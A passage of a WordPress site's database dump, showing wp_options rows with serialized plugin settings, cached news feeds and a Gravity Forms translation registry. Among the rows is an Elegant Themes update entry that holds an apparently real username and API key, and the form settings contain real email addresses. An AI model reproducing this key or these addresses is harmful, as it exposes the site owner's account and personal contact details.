\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:48:\"WpOrg\\Requests\\Utility\\CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 19 Apr 2023 15:45:28 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Mon, 10 Apr 2023 12:00:00 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:16:\"content-encoding\";s:2:\"br\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20211221090300\";}','no'),(19092,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1681962328','no'),(19093,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1681919128','no'),(19094,'_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b','1681962328','no'),(19095,'_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2023/04/episode-53-a-look-at-wordpress-6-2-dolphy/\'>WP Briefing: Episode 53: A Look at WordPress 6.2 “Dolphy”</a></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2023/04/the-month-in-wordpress-march-2023/\'>The Month in WordPress – March 2023</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wptavern.com/podcast/72-steve-bruner-and-timothy-jacobs-on-using-gutenberg-outside-of-wordpress\'>WPTavern: #72 – Steve Bruner and Timothy Jacobs on Using Gutenberg Outside of WordPress</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/atarim-to-host-4th-annual-virtual-web-agency-summit-april-25-28\'>WPTavern: Atarim to Host 4th Annual Virtual Web Agency Summit April 25-28</a></li><li><a class=\'rsswidget\' href=\'https://dothewoo.io/a-journey-to-improve-the-woocommerce-onboarding/\'>Do The Woo Community: A Journey to Improve the WooCommerce Onboarding with Vikas Singhal</a></li></ul></div>','no'),(19098,'_site_transient_timeout_community-events-120a4e9a868885de2f8951232177266e','1681962336','no'),(19099,'_site_transient_community-events-120a4e9a868885de2f8951232177266e','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"67.198.116.0\";}s:6:\"events\";a:0:{}}','no'),(740,'et_pb_builder_plugin_status','activated','yes'),(1019,'tadv_settings','a:10:{s:9:\"toolbar_1\";s:71:\"styleselect,blockquote,backcolor,wp_page,charmap,table,emoticons,wp_adv\";s:9:\"toolbar_2\";s:78:\"formatselect,outdent,indent,pastetext,wp_more,wp_help,hr,subscript,superscript\";s:9:\"toolbar_3\";s:84:\"fontselect,link,unlink,bullist,numlist,alignleft,aligncenter,alignjustify,alignright\";s:9:\"toolbar_4\";s:69:\"fontsizeselect,forecolor,italic,bold,underline,removeformat,undo,redo\";s:21:\"toolbar_classic_block\";s:123:\"formatselect,bold,italic,blockquote,bullist,numlist,alignleft,aligncenter,alignright,link,forecolor,backcolor,table,wp_help\";s:13:\"toolbar_block\";s:67:\"core/code,core/image,core/strikethrough,tadv/mark,tadv/removeformat\";s:18:\"toolbar_block_side\";s:46:\"core/superscript,core/subscript,core/underline\";s:12:\"panels_block\";s:44:\"tadv/color-panel,tadv/background-color-panel\";s:7:\"options\";s:44:\"menubar_block,menubar,merge_toolbars,advlist\";s:7:\"plugins\";s:23:\"emoticons,table,advlist\";}','yes'),(891,'et_automatic_updates_options','a:2:{s:8:\"username\";s:13:\"CorridorMedia\";s:7:\"api_key\";s:40:\"f619d3dc3566fdf135533e40a5145de8b6e0e977\";}','no'),(939,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:4;}}','yes'),(1020,'tadv_admin_settings','a:2:{s:7:\"options\";s:86:\"classic_paragraph_block,table_resize_bars,table_grid,table_tab_navigation,table_advtab\";s:16:\"disabled_editors\";s:0:\"\";}','yes'),(1021,'tadv_version','5900','yes'),(14187,'dsm_general','a:2:{s:25:\"dsm_use_scheduled_content\";s:3:\"off\";s:17:\"dsm_use_shortcode\";s:2:\"on\";}','yes'),(14188,'dsm_theme_builder','','yes'),(14189,'dsm_settings_social_media','','yes'),(14190,'dsm_settings_misc','a:4:{s:18:\"dsm_dynamic_assets\";s:3:\"off\";s:32:\"dsm_dynamic_assets_compatibility\";s:3:\"off\";s:23:\"dsm_uninstall_on_delete\";s:3:\"off\";s:26:\"dsm_allow_mime_json_upload\";s:2:\"on\";}','yes'),(3505,'nex-forms-version','8.3','yes'),(3506,'nf-first-run','1','yes'),(3507,'nex-forms-preferences','a:4:{s:17:\"field_preferences\";a:6:{s:16:\"pref_label_align\";s:3:\"top\";s:21:\"pref_label_text_align\";s:10:\"align_left\";s:15:\"pref_label_size\";s:0:\"\";s:14:\"pref_sub_label\";s:0:\"\";s:21:\"pref_input_text_align\";s:10:\"aling_left\";s:15:\"pref_input_size\";s:0:\"\";}s:22:\"validation_preferences\";a:10:{s:17:\"pref_requered_msg\";s:8:\"Required\";s:21:\"pref_email_format_msg\";s:21:\"Invalid email address\";s:21:\"pref_phone_format_msg\";s:20:\"Invalid phone number\";s:19:\"pref_url_format_msg\";s:11:\"Invalid URL\";s:23:\"pref_numbers_format_msg\";s:24:\"Only numbers are allowed\";s:20:\"pref_char_format_msg\";s:21:\"Only text are allowed\";s:25:\"pref_invalid_file_ext_msg\";s:22:\"Invalid file extension\";s:21:\"pref_max_file_exceded\";s:35:\"Maximum File Size of {x}MB Exceeded\";s:24:\"pref_max_file_ul_exceded\";s:43:\"Only a maximum of {x} files can be uploaded\";s:24:\"pref_max_file_af_exceded\";s:48:\"Maximum Size for all files can not exceed {x}MB \";}s:17:\"email_preferences\";a:7:{s:23:\"pref_email_from_address\";s:24:\"terra@smcorridornews.com\";s:20:\"pref_email_from_name\";s:19:\"J. Sutton Financial\";s:21:\"pref_email_recipients\";s:24:\"terra@smcorridornews.com\";s:18:\"pref_email_subject\";s:42:\"J. Sutton Financial - NEX-Forms Submission\";s:15:\"pref_email_body\";s:16:\"{{nf_form_data}}\";s:23:\"pref_user_email_subject\";s:42:\"J. Sutton Financial - NEX-Forms Submission\";s:20:\"pref_user_email_body\";s:65:\"Thank you for connecting with us. We will respond to you shortly.\";}s:17:\"other_preferences\";a:1:{s:28:\"pref_other_on_screen_message\";s:65:\"Thank you for connecting with us. We will respond to you shortly.\";}}','yes'),(3508,'nex-forms-email-config','a:8:{s:12:\"email_method\";s:10:\"php_mailer\";s:13:\"email_content\";s:4:\"html\";s:9:\"smtp_auth\";s:1:\"0\";s:9:\"smtp_host\";s:14:\"smtp.gmail.com\";s:17:\"email_smtp_secure\";s:3:\"tls\";s:9:\"mail_port\";s:3:\"587\";s:13:\"set_smtp_user\";s:0:\"\";s:13:\"set_smtp_pass\";s:0:\"\";}','yes'),(3509,'nex-forms-script-config','a:16:{s:10:\"inc-jquery\";s:1:\"1\";s:18:\"inc-jquery-ui-core\";s:1:\"1\";s:26:\"inc-jquery-ui-autocomplete\";s:1:\"1\";s:20:\"inc-jquery-ui-slider\";s:1:\"1\";s:15:\"inc-jquery-form\";s:1:\"1\";s:13:\"inc-bootstrap\";s:1:\"1\";s:10:\"inc-onload\";s:1:\"1\";s:10:\"inc-moment\";s:1:\"1\";s:12:\"inc-datetime\";s:1:\"1\";s:8:\"inc-math\";s:1:\"1\";s:13:\"inc-colorpick\";s:1:\"1\";s:7:\"inc-wow\";s:1:\"1\";s:8:\"inc-raty\";s:1:\"1\";s:10:\"inc-locals\";s:1:\"1\";s:7:\"inc-sig\";s:1:\"0\";s:20:\"enable-print-scripts\";i:0;}','yes'),(3510,'nex-forms-style-config','a:6:{s:15:\"incstyle-jquery\";s:1:\"1\";s:21:\"incstyle-font-awesome\";s:1:\"1\";s:18:\"incstyle-bootstrap\";s:1:\"1\";s:19:\"incstyle-animations\";s:1:\"1\";s:15:\"incstyle-custom\";s:1:\"1\";s:19:\"enable-print-styles\";i:1;}','yes'),(3511,'nex-forms-other-config','a:6:{s:20:\"enable-print-scripts\";s:1:\"0\";s:19:\"enable-print-styles\";s:1:\"1\";s:14:\"enable-tinymce\";s:1:\"1\";s:13:\"enable-widget\";s:1:\"1\";s:18:\"enable-color-adapt\";s:1:\"1\";s:17:\"set-wp-user-level\";s:13:\"administrator\";}','yes'),(3512,'nf_set_attachments','1','yes'),(3521,'7103891','a:2:{i:0;s:11:\"61629300613\";i:1;i:1680393600;}','yes'),(3522,'tmp_csv_export','a:3:{s:5:\"query\";s:81:\"SELECT * FROM wpfi_wap_nex_forms_files  WHERE Id<>\"\"  ORDER BY Id DESC LIMIT 0,50\";s:4:\"cols\";s:0:\"\";s:7:\"form_Id\";N;}','yes'),(3741,'et_support_center_setup_done','processed','yes'),(3524,'198301761629300613','a:1:{i:0;s:36:\"46455a58-27ab-4ecc-aa6b-68c17c2d15bb\";}','yes'),(3525,'nf_activated','1','yes'),(890,'et_google_api_settings','a:3:{s:7:\"api_key\";s:0:\"\";s:16:\"use_google_fonts\";s:2:\"on\";s:26:\"enqueue_google_maps_script\";s:2:\"on\";}','yes'),(9171,'gf_db_version','2.7.4','no'),(9172,'rg_form_version','2.7.4','no'),(9173,'gform_enable_background_updates','1','yes'),(9174,'_site_transient_t15s-registry-gforms','O:8:\"stdClass\":2:{s:8:\"projects\";a:55:{s:26:\"gravityformsactivecampaign\";a:1:{s:12:\"translations\";a:24:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:17+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:47+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-04-29T16:44:58+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:09+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:02+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:49+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:50+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:54+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-02T20:28:07+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:56+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:48+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:31:58+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-27T13:41:07+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-25T15:23:16+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-14T17:35:58+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:38:41+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:10+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-24T15:29:26+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:12+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:14+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-31T16:22:35+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:16+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-21T10:42:11+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:32:33+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformsactivecampaign/gravityformsactivecampaign-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:18:\"gravityformsaweber\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-27T08:43:10+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T07:59:21+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-27T08:43:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2022-06-27T08:43:18+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-10-21T13:22:59+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:55:13+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:55:29+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:55:31+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:55:38+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-03-14T17:39:27+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T07:59:23+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-12-17T14:59:58+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-12-17T15:52:40+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2020-11-04T15:46:22+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsaweber/gravityformsaweber-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:6:\"2.11.1\";s:7:\"updated\";s:25:\"2023-01-06T16:55:20+00:00\";s:12:\"english_name\";s:15:\"Spanish 